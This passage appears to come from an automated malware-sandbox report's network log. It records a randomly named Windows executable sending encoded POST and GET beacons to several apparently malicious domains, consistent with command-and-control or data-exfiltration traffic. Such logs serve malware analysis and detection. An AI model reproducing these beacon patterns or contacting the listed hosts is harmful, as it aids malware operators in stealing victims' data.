                                                                                    Jan 9, 2025 16:57:02.222676039 CET21INData Raw: 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: b+0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    46192.168.11.3049871104.21.32.1805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:04.508842945 CET831OUTPOST /w98i/ HTTP/1.1
                                                                                    Host: www.buyspeechst.shop
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.buyspeechst.shop
                                                                                    Referer: http://www.buyspeechst.shop/w98i/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 4b 68 6d 61 77 45 66 4e 54 55 35 47 55 33 6e 6c 4e 76 66 66 43 66 35 71 4a 33 61 6d 34 64 31 43 54 65 55 75 6c 4a 42 32 7a 46 6b 6e 49 7a 43 67 6b 4f 54 4e 4d 6b 4b 31 2b 69 58 4f 42 39 69 65 51 4a 51 52 31 61 47 6f 6e 75 35 2f 37 6f 35 4c 67 66 38 64 38 30 73 79 6e 2f 30 52 65 6e 49 68 32 74 6b 69 4c 71 45 6e 63 71 5a 52 4a 31 56 44 4a 62 69 43 43 75 58 58 6b 63 42 48 69 34 63 49 55 43 30 73 6e 42 57 45 77 6a 54 67 69 4f 2b 33 4d 55 57 51 71 66 32 2f 66 34 73 31 4d 66 41 6a 6c 2b 6b 7a 4b 79 62 35 50 37 33 6c 79 44 66 2b 6e 6e 79 74 2b 76 67 57 36 36 6d 59 70 46 79 67 6e 37 63 6c 52 30 57 46 31 73 3d
                                                                                    Data Ascii: 6B-l7F=ZdYnZ6+WLY4YYKhmawEfNTU5GU3nlNvffCf5qJ3am4d1CTeUulJB2zFknIzCgkOTNMkK1+iXOB9ieQJQR1aGonu5/7o5Lgf8d80syn/0RenIh2tkiLqEncqZRJ1VDJbiCCuXXkcBHi4cIUC0snBWEwjTgiO+3MUWQqf2/f4s1MfAjl+kzKyb5P73lyDf+nnyt+vgW66mYpFygn7clR0WF1s=
                                                                                    Jan 9, 2025 16:57:04.781955004 CET854INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:04 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJO2FK9AJGTkAq99G%2Bdjq3Vc6cxrXhB42WFqvbhE%2FKlJ4a8w6zEPZf385%2BNpegU5X6Zhz%2FKLFEvlkcBqWt1L9RF72xBetg%2FLwZFAecHD23i%2BaCY5DCPjOYXo4IUl0pfkGdzzVHw9yg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59ef79e5810ed-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=118653&min_rtt=118653&rtt_var=59326&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                    Data Ascii: f
                                                                                    Jan 9, 2025 16:57:04.781964064 CET223INData Raw: 64 39 0d 0a 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12
                                                                                    Data Ascii: d9Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_+
                                                                                    Jan 9, 2025 16:57:04.782109022 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    47192.168.11.3049872104.21.32.1805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:07.165983915 CET3948OUTPOST /w98i/ HTTP/1.1
                                                                                    Host: www.buyspeechst.shop
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.buyspeechst.shop
                                                                                    Referer: http://www.buyspeechst.shop/w98i/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 4b 68 6d 61 77 45 66 4e 54 55 35 47 55 33 6e 6c 4e 76 66 66 43 66 35 71 4a 33 61 6d 34 56 31 65 77 57 55 73 43 56 42 31 7a 46 6b 38 6f 7a 44 67 6b 50 52 4e 4d 73 52 31 2b 6e 69 4f 44 31 69 4d 6a 52 51 41 52 4f 47 37 48 75 35 6a 4c 6f 38 50 67 66 70 64 36 55 6f 79 6e 76 30 52 65 6e 49 68 30 46 6b 6c 65 57 45 6c 63 71 57 62 70 31 4a 4a 70 61 39 43 47 4b 74 58 6b 49 52 48 68 59 63 4a 6e 36 30 73 52 31 57 45 77 6a 54 71 43 4f 37 33 4d 59 54 51 71 58 69 2f 65 78 52 31 39 37 41 6d 51 54 50 72 75 69 2b 69 2b 4c 4d 74 6d 54 41 31 6c 2f 79 71 63 66 48 66 4d 32 74 5a 5a 56 4e 73 6e 6e 6e 67 44 67 4b 47 6c 63 61 42 66 63 52 70 71 37 58 61 79 6a 31 66 58 69 45 55 48 48 76 6f 61 62 51 75 41 4b 61 39 76 59 42 2b 4e 69 77 7a 75 52 6c 52 53 36 43 33 77 4b 75 7a 6b 65 48 78 53 78 77 2b 54 45 44 4c 39 71 48 7a 50 62 52 4f 38 72 5a 58 53 61 71 51 4b 6c 52 78 41 55 48 2b 43 57 72 69 2f 50 66 52 42 71 6f 62 78 36 47 61 69 79 39 43 36 33 56 32 69 55 51 68 6b 75 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=ZdYnZ6+WLY4YYKhmawEfNTU5GU3nlNvffCf5qJ3am4V1ewWUsCVB1zFk8ozDgkPRNMsR1+niOD1iMjRQAROG7Hu5jLo8Pgfpd6Uoynv0RenIh0FkleWElcqWbp1JJpa9CGKtXkIRHhYcJn60sR1WEwjTqCO73MYTQqXi/exR197AmQTPrui+i+LMtmTA1l/yqcfHfM2tZZVNsnnngDgKGlcaBfcRpq7Xayj1fXiEUHHvoabQuAKa9vYB+NiwzuRlRS6C3wKuzkeHxSxw+TEDL9qHzPbRO8rZXSaqQKlRxAUH+CWri/PfRBqobx6Gaiy9C63V2iUQhku89kG339qaXLDkw2t+Rk4qwLc54rvtNnDE8YaLT8MdFJ39OMBqGZlJOvJqZwbwB/4ARkmW1KWdM4DDRsKtlk9O1tGm34s1BYbWecsNjSZMjwnLLXPAyrNLHrvLBf4HuH/AJxuynxdEgxlC256NgcctU2CCihVWUMCFykExxkAVQw5aAFFBe+7vxSzjvbgCbJABMhiewL+0DKHZ9A9wT8+yArS0kObTvImygg5gxelZ4h36+WSBFr1HsrJFyrfEbGG432tQoqJApkKtCWUstyvuR2F1KSf3VArK+cxxUc7OhkHszByrbXEEcb4lFAy43eJB/gwMyVb9ocgZX6yKHZBXjfgCS2Qkai2pmU/T/Dy9dF6K2OOrKu5veeLHNuG09Irk8wauQ0gnqAs5l4fMu3caS4LaNFjrn+g3zmMIkUOawDcfkJbutI17kZ1YZqetYw7KpRawK3EVyAM2X0HGq7kgglJ6kHRDSTfvM61MkYivIwPD94zQfNz12Zuar6lPjQYeQpUS5cJUWQ+oPjc5gythif/Qn63jAj5K7ECCex1nm10m8LDbpLMYPqSWgPXk3UkKr6TAkkOVdE9BxwsfBKG+h3HHL40F0XPNjZj1LB7647I2EI92HpgLX/dgpCQR7bzCrCJfLDFiUeDik2cNM+M4nRENMiE5A6y4V [TRUNCATED]
                                                                                    Jan 9, 2025 16:57:07.466294050 CET1057INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:07 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O4WYtCaLEnUX2VSFNq%2FqIwxr%2FeBLm8p6A2l8ta%2B%2FdYaAUOTCSygldZ%2B52CBVVBLmPxtND1Gd2YpygCyX%2FAHRf5fviTFOnUbf1OWkETVoqvdYbbirkwGf6qH5gaj97YSuHFRCOW5hYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59f082da1874f-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=118836&min_rtt=118836&rtt_var=59418&sent=2&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3948&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a
                                                                                    Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
                                                                                    Jan 9, 2025 16:57:07.466348886 CET16INData Raw: 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a
                                                                                    Data Ascii: b+
                                                                                    Jan 9, 2025 16:57:07.466401100 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    48192.168.11.3049873104.21.32.1805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:09.817972898 CET539OUTGET /w98i/?6B-l7F=UfwHaNGeM7ohZqxLfFoMCRROWED3zeeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5VntXdX45GkikqbyqPY=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.buyspeechst.shop
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:57:10.238609076 CET1077INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:10 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCoKElnvZjL8eD3iYDX9OYPTFhsb14hFxTPkx%2BbLOw9KH5IsIzakScLCZd90t2O0akzI26K5JKnnGybcP8WLlCqDSUKk2XIyYIX0m9W2rRXNFHmakYfy9ZCm2C%2BGFl%2B7jfdUZGXihQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59f18cd10a49b-ORD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119224&min_rtt=119224&rtt_var=59612&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 79 73 70 65 65 63 68 73 74 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                    Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port 80</address></body></html>
                                                                                    Jan 9, 2025 16:57:10.238626003 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    49192.168.11.304987447.83.1.90805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:15.769455910 CET796OUTPOST /gcvb/ HTTP/1.1
                                                                                    Host: www.lejgnu.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.lejgnu.info
                                                                                    Referer: http://www.lejgnu.info/gcvb/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 63 31 68 32 58 53 44 4d 72 37 77 67 52 6e 70 6b 4d 35 5a 31 6c 38 49 41 6d 35 53 41 74 58 47 5a 43 4a 45 66 4b 65 70 61 33 56 4d 39 73 4b 31 44 75 50 6e 33 75 4f 71 6a 49 36 6e 41 63 71 36 5a 76 36 44 4e 41 48 6a 4d 69 61 4e 36 79 35 36 35 4c 62 75 41 2b 43 73 78 75 71 42 75 70 43 44 42 43 75 65 33 78 5a 4f 58 61 61 66 6c 65 69 54 44 51 53 2f 30 73 44 74 48 62 70 6e 32 79 31 6f 59 45 66 67 36 47 68 33 62 69 56 6c 6e 67 51 72 50 42 6b 7a 4e 58 51 6a 78 58 64 63 58 50 78 62 74 71 46 4d 44 69 30 4e 6d 6f 46 62 59 35 33 2f 66 78 46 78 61 58 6d 31 32 71 75 75 2f 74 52 50 74 76 51 3d 3d
                                                                                    Data Ascii: 6B-l7F=c1h2XSDMr7wgRnpkM5Z1l8IAm5SAtXGZCJEfKepa3VM9sK1DuPn3uOqjI6nAcq6Zv6DNAHjMiaN6y565LbuA+CsxuqBupCDBCue3xZOXaafleiTDQS/0sDtHbpn2y1oYEfg6Gh3biVlngQrPBkzNXQjxXdcXPxbtqFMDi0NmoFbY53/fxFxaXm12quu/tRPtvQ==
                                                                                    Jan 9, 2025 16:57:16.761316061 CET137INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:57:16 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    50192.168.11.304987547.83.1.90805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:18.625554085 CET816OUTPOST /gcvb/ HTTP/1.1
                                                                                    Host: www.lejgnu.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.lejgnu.info
                                                                                    Referer: http://www.lejgnu.info/gcvb/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 63 31 68 32 58 53 44 4d 72 37 77 67 51 45 78 6b 4b 5a 6c 31 69 63 49 44 73 5a 53 41 69 33 47 64 43 4f 4d 66 4b 61 77 58 33 47 34 39 76 76 52 44 74 4c 4c 33 70 4f 71 6a 63 71 6e 4a 53 4b 36 51 76 36 65 77 41 43 4c 4d 69 61 5a 36 79 37 53 35 4b 71 75 66 2b 53 73 4a 77 4b 42 37 74 43 44 42 43 75 65 33 78 5a 4b 74 61 61 58 6c 5a 54 6a 44 52 32 54 33 6b 6a 74 45 63 70 6e 32 67 46 6f 55 45 66 67 39 47 6a 43 4d 69 58 74 6e 67 51 37 50 50 57 62 4f 63 51 6a 33 50 39 64 54 47 42 36 70 68 6b 4d 78 78 55 42 76 6d 48 58 67 34 67 53 46 73 47 46 59 45 47 4a 62 32 76 44 58 76 54 4f 32 79 59 68 37 70 63 45 56 42 5a 7a 7a 4d 6f 35 70 48 33 6e 61 77 31 63 3d
                                                                                    Data Ascii: 6B-l7F=c1h2XSDMr7wgQExkKZl1icIDsZSAi3GdCOMfKawX3G49vvRDtLL3pOqjcqnJSK6Qv6ewACLMiaZ6y7S5Kquf+SsJwKB7tCDBCue3xZKtaaXlZTjDR2T3kjtEcpn2gFoUEfg9GjCMiXtngQ7PPWbOcQj3P9dTGB6phkMxxUBvmHXg4gSFsGFYEGJb2vDXvTO2yYh7pcEVBZzzMo5pH3naw1c=
                                                                                    Jan 9, 2025 16:57:19.623817921 CET137INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:57:19 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    51192.168.11.304987647.83.1.90805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:21.479825974 CET1289OUTPOST /gcvb/ HTTP/1.1
                                                                                    Host: www.lejgnu.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.lejgnu.info
                                                                                    Referer: http://www.lejgnu.info/gcvb/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 63 31 68 32 58 53 44 4d 72 37 77 67 51 45 78 6b 4b 5a 6c 31 69 63 49 44 73 5a 53 41 69 33 47 64 43 4f 4d 66 4b 61 77 58 33 48 41 39 76 5a 64 44 74 71 4c 33 6f 4f 71 6a 41 61 6e 45 53 4b 37 43 76 36 47 38 41 43 50 63 69 5a 68 36 39 34 71 35 4e 59 57 66 30 53 73 4a 34 71 41 63 70 43 43 44 43 75 75 7a 78 59 36 74 61 61 58 6c 5a 51 37 44 59 43 2f 33 70 44 74 48 62 70 6d 35 79 31 6f 34 45 66 6f 79 47 6a 57 63 69 56 39 6e 67 44 54 50 50 6a 76 4f 63 51 6a 33 51 64 64 6f 47 42 32 6f 68 6b 55 74 78 57 68 2f 6d 32 44 67 34 42 2f 30 39 57 56 42 51 33 39 33 77 50 50 31 67 79 79 2b 38 49 74 44 68 73 59 63 49 6f 37 74 50 63 70 75 63 69 37 39 74 7a 31 46 6b 41 4c 38 48 4b 6a 37 70 4a 76 6b 6c 4f 77 4a 61 6c 6f 35 51 57 6c 44 6b 4e 58 4e 77 62 68 4b 45 54 37 34 6a 35 53 64 4d 49 55 2b 62 61 65 38 32 2f 75 66 63 2f 75 37 45 73 70 65 4f 41 55 56 55 4d 65 75 44 45 7a 6e 52 32 4b 4f 6b 35 78 69 67 70 59 42 77 66 53 55 4c 6e 50 78 2b 50 6a 6b 58 6c 41 67 50 71 78 41 65 4f 76 4b 37 65 4a 6e 45 4e 46 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=c1h2XSDMr7wgQExkKZl1icIDsZSAi3GdCOMfKawX3HA9vZdDtqL3oOqjAanESK7Cv6G8ACPciZh694q5NYWf0SsJ4qAcpCCDCuuzxY6taaXlZQ7DYC/3pDtHbpm5y1o4EfoyGjWciV9ngDTPPjvOcQj3QddoGB2ohkUtxWh/m2Dg4B/09WVBQ393wPP1gyy+8ItDhsYcIo7tPcpuci79tz1FkAL8HKj7pJvklOwJalo5QWlDkNXNwbhKET74j5SdMIU+bae82/ufc/u7EspeOAUVUMeuDEznR2KOk5xigpYBwfSULnPx+PjkXlAgPqxAeOvK7eJnENFYNaBzAoeEpcTuzZThHdgA1us1yQJ5k3UPzTKBdTQLjftOAziSd+8e0aV/fBTOhC1aXK0iVODCrlXiQl0A4PO1AE5gAtxuP2PWSlLEZfcqelMKseR2rVxhAj/3SCji2sFgdNyh92gHQUA5luVDAQEHkq/WM0KrzBlPLYchXRcUBIaXapXATlnGW9cVY2q9MbiCibQU44K/L6h/xS+JjApF7eZy5NEq7H/ZXjJcYlihwHreGAglKyvEHL9N3qY73cPloOV5RmDFqQixjWSi64TrgEJKe6tSP9e6gYnsH3AKZbAyWCNWTKGw47E7uJTt5nZB19bTSceq+FlzraL+bdv5duootT4F/VjfvT+D
                                                                                    Jan 9, 2025 16:57:21.479873896 CET2644OUTData Raw: 32 73 42 56 36 6a 34 77 61 6d 37 68 4f 71 5a 6c 4a 44 68 67 68 6f 31 70 73 72 74 2b 77 50 59 31 2f 39 6b 68 45 31 77 4b 6e 73 73 62 77 75 47 68 52 63 53 77 75 7a 45 31 53 6b 79 44 56 58 2f 58 44 71 6c 32 48 46 59 4a 61 47 37 34 49 57 35 71 4c 41
                                                                                    Data Ascii: 2sBV6j4wam7hOqZlJDhgho1psrt+wPY1/9khE1wKnssbwuGhRcSwuzE1SkyDVX/XDql2HFYJaG74IW5qLApC4RnBWFlMDj4AzWeVlGKwg7/0haqil/zWE2x6qeT6981eZgj5O10YzCx3oVaAnuvRK3uZuSG8CKM9bJhVgm8ACquEXwUqy9SQoLkGZ+uGV0wFzDPJdp2rNdG7unjbDyUHymNw53pLMj8EIjl4GWtCP/KkJw1tB2z
                                                                                    Jan 9, 2025 16:57:22.481483936 CET137INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:57:22 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    52192.168.11.304987747.83.1.90805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:24.313226938 CET534OUTGET /gcvb/?6B-l7F=R3JWUl3ivpsXcFtFFeliieQU9JuOkkLjcoMED/ZSuHZ0i4hSpIKzgOSsfpnIAqnHyqi+O0adg4Vr07jACry21CI+4oE0/hewEO2O8IWqeYD/JQ6qTGavsAY=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.lejgnu.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:57:25.324420929 CET139INHTTP/1.1 567 unknown
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:57:25 GMT
                                                                                    Content-Length: 17
                                                                                    Connection: close
                                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                                    Data Ascii: Request too large


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    53192.168.11.3049878194.9.94.85805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:33.712259054 CET533OUTGET /js1x/?80k=lRapCPMXgDk&6B-l7F=YzadGC6YqOgjY/9t8WEBSxHCudcKSJxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswOCkfsfu+tPWB6ee9FA= HTTP/1.1
                                                                                    Host: www.milp.store
